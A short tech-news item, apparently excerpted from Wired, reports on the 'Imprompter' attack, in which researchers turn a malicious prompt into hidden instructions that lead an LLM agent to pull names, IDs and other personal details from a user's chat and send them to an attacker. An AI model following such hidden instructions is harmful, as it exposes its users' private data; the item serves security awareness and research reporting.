Get the latest tech news

This Prompt Can Make an AI Chatbot Identify and Extract Personal Details From Your Chats


Security researchers created an algorithm that turns a malicious prompt into a set of hidden instructions that could send a user's personal information to an attacker.

The attack type particularly worries security experts as LLMs are increasingly turned into agents that can carry out tasks on behalf of a human, such as booking flights or being connected to an external database to provide specific answers. The Imprompter attacks on LLM agents start with a natural language prompt (as shown above) that tells the AI to extract all personal information, such as names and IDs, from the user’s conversation. “Releasing an LLM agent that accepts arbitrary user input should be considered a high-risk activity that requires significant and creative security testing prior to deployment,” McInerney says.

Get the Android app

Or read this on Wired

Read more on:

Photo of Prompt

Prompt

Photo of chats

chats

Photo of personal details

personal details

Related news:

News photo

Blocking the "Sign in with Google" Prompt

News photo

WhatsApp fix to make View Once chats actually disappear is beaten in less than a week

News photo

WhatsApp still working on making View Once chats actually disappear for all